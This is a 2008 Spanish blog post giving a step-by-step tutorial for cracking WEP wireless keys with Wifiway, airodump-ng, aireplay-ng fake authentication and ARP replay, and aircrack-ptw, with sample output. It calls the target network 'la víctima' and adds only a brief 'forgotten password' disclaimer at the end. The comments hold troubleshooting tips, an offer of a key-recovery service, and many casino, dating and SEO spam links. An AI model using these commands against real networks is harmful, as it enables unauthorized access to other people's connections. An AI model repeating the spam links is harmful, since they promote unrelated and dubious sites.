jueves, 7 de febrero de 2008

Obtener clave WEP

ACTUALIZACIÓN AQUÍ


Como muchos me preguntais sobre como obtener una clave wep, os lo dejor por aquí para que tengais toda la info a mano.

Lo que necesitais:

Este minituto está pensado para un ordenador portátil con tarjeta de red intel 3945 (ya que muchosportatiles están saliendo con ella) aunque no descarto que no funcione con otros dispositivos.

Tambien necesitaremos una distribucion de Linux, en live CD, yo usé Wifiway, se descarga aquí:
Wifiway

Ya está, no necesitamos nada más, ni instalar nada ni descargar nada más.

Arrancamos la live y después de configurar el idioma, una vez todo cargado, arrancamos las X, escribiendo "startx" (sin comillas)

Una vez en el entorno gráfico abrimos una consola.


Y escribimos:

wifiway:/# ipw3945_es.sh

nos pedirá que introduzcamos el canal, el rate y la dirección mac

Para el canal, se refiere al canal de la conexion que intentamos averiguar, si no lo sabemos podemos ir probando (con valores del 1 al 12) para el rate, siempre 2 y la mac, empezaremos poniendo 00:11:22:33:44:55

Ahora escribiremos:

wifiway:/# airodump-ng rtap0

Nos saldrá algo así:
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR
00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear

BSSID STATION PWR Lost Packets Probes

00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14
(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 5
Donde CH es el canal, BSSID la dirección MAC de la víctima y ESSID el nombre de la red.

Volvemos a escribir:

wifiway:/# ipw3945_es.sh

Pero ahora introducimos los datos del canal y la dirección MAC

Seguimos escribiendo:

wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0

Nos saldrá esto:

20:18:20 Sending Authentication Request
20:18:20 Authentication successful
20:18:20 Sending Association Request
20:18:20 Association successful :-)

Escribimos:

wifiway:/# aireplay-ng -3 -b MAC_AP -h NUESTRA_MAC wifi0

Abrimos otra consola y escribimos:

wifiway:/# airodump-ng -w /tmp/dump rtap0

Ahora a esperar a que suban los data.

En otra consola tecleamos:

wifiway:/# aircrack-ptw /tmp/dump-01.cap

Y ya está, vamos probando (volviendo a escribir en la tercera consola lo anterior) hasta que nos de la contraseña.

El tiempo necesarios es proporcional a la distacia.


Preguntas que os puedes salir:

¿como sé si mi targeta es una intel 3945?¿Y mi dirección mac?

Muy fácil, (desde Windows) en propiedades de mi PC\Hardware\Administrador de dispositivos\adaptador de red.
Además, tambien allí, en propiedades de la misma tarjeta y en la pestaña, avanzadas, podemos ver nuestra dirección MAC

Debo escribir en la consola pero no puedo.

Presiona CONTROL+C para que la consola deje de trabajar y acepte una nueva orden.

Recordad que os dejo esto, sólo por si habeis olvidado vuestra contraseña wep, o para que comprobeis lo fácil que es obtenerla y os planteeis otra forma de seguridad.




12 comentarios:

Juan Miguel Alcarria dijo...

Hola, en la misma página de la que habeis sacado los pasos a seguir existe otro manual para la protección de una red wifi, que me parece muchísimo más interesante, soy el creador de lso dos documentos y me gusta más la solución :-)

Podeis verlo aquí:

Control de Ancho de Banda con OpenWRT

Saludos.

Juanmi.

Anónimo dijo...

Hola!
Estaba siguiendo los pasos, pero cuando escribo:
airodump -ng rtap0
me dice que
-ng is not a network interface

como lo soluciono?
gracias!

barli dijo...

Intenta no dejar un espacio entre airodump y -ng.

Er FeR! dijo...

Se que hace mucho que no se comenta pero en vez de hacer todo eso con el shell, por que no usan el Airoscript?? lo automatiza todo...

Wep dijo...

Si necesitas recuperar claves wep y no sabes como, entra en http://deliverywifi.blogspot.com/ o enviame un mail a deliverywifi@yahoo.es

Anónimo dijo...

Predilection casinos? attest to this stylish [url=http://www.realcazinoz.com]casino[/url] advisor and personate evasively online casino games like slots, blackjack, roulette, baccarat and more at www.realcazinoz.com .
you can also into our redesigned [url=http://freecasinogames2010.webs.com]casino[/url] orientate at http://freecasinogames2010.webs.com and do in true to life spondulix !
another late-model [url=http://www.ttittancasino.com]casino spiele[/url] livelihood is www.ttittancasino.com , during german gamblers, wake up during munificent online casino bonus.

Anónimo dijo...

crt new hat this gratis [url=http://www.casinoapart.com]casino[/url] hand-out at the greatest [url=http://www.casinoapart.com]online casino[/url] direct with 10's of with it [url=http://www.casinoapart.com]online casinos[/url]. tame [url=http://www.casinoapart.com/articles/play-roulette.html]roulette[/url], [url=http://www.casinoapart.com/articles/play-slots.html]slots[/url] and [url=http://www.casinoapart.com/articles/play-baccarat.html]baccarat[/url] at this [url=http://www.casinoapart.com/articles/no-deposit-casinos.html]no silt casino[/url] , www.casinoapart.com
the finest [url=http://de.casinoapart.com]casino[/url] with a sifting UK, german and all nigh forward gesticulation of the world. so in behalf of the insigne [url=http://es.casinoapart.com]casino en linea[/url] interfere with us now.

Anónimo dijo...

I seldom write comments, but i did some searching and wound up
here "Obtener clave WEP". And I do have 2 questions for you if it's allright. Is it only me or does it look as if like a few of these responses look like they are left by brain dead visitors? :-P And, if you are writing at other online sites, I would like to follow anything new you have to post. Would you make a list of the complete urls of your shared pages like your Facebook page, twitter feed, or linkedin profile?

my web-site 50statescasino usa online casinos

Anónimo dijo...

My partner and I absolutely love your blog and find a lot of
your post's to be exactly what I'm looking for. Does one offer guest writers to write
content in your case? I wouldn't mind producing a post or elaborating on many of the subjects you write in relation to here. Again, awesome web site!

my web-site ... bleacherreport.com

Anónimo dijo...

Hello! Do you use Twitter? I'd like to follow you if that would be ok. I'm undoubtedly enjoying your blog and look forward to new posts.


Visit my web blog; www.sailingbuddys.com

Anónimo dijo...

An intriguing discussion is definitely worth comment. I believe that you need
to publish more on this issue, it might not be a taboo matter but usually folks don't speak about such topics. To the next! Cheers!!

Have a look at my weblog - the throne of fire

Anónimo dijo...

plus size girls dating site http://loveepicentre.com/testimonials/ online dating incidents
latest dating websites for gay [url=http://loveepicentre.com/map/]missy elliott and timbaline dating[/url] shippensburg dating
animal attraction dating [url=http://loveepicentre.com/testimonials/]internet dating etiquette[/url] ohio law psychologist dating patient [url=http://loveepicentre.com/user/PureFun/]PureFun[/url] dating seminars